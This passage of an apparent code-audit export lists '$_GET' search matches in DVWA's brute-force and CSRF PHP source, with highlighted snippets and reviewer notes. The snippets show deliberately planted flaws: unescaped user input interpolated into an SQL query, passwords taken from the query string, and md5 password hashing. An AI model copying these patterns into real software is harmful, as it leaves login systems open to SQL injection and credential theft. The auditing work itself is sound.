variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 65,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span 
class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span 
class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database",
  "line": 13,
  "start": 8,
  "end": 19,
  "severity": "unknown",
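  "note": "Line 13 takes the password from the query string, where it can be recorded in server logs and browser history; line 16 then hashes it with a single md5() call, which is too fast for password storage. The query that consumes $pass is outside this excerpt."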
 },
 {
  "id": 77,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get username\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 78,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get username\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token 
punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 79,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get username\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token 
operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token 
punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
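  "note": "Line 12 builds the SQL text by interpolating $user, which line 5 reads from $_GET with no escaping or parameter binding (SQL injection); bind the values in a prepared statement instead. $pass is reduced to an md5() digest on line 9 before it reaches the query, and md5() is not a suitable password hash."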
 },
 {
  "id": 82,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 83,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span 
class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 84,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span 
class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token 
punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 142,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span 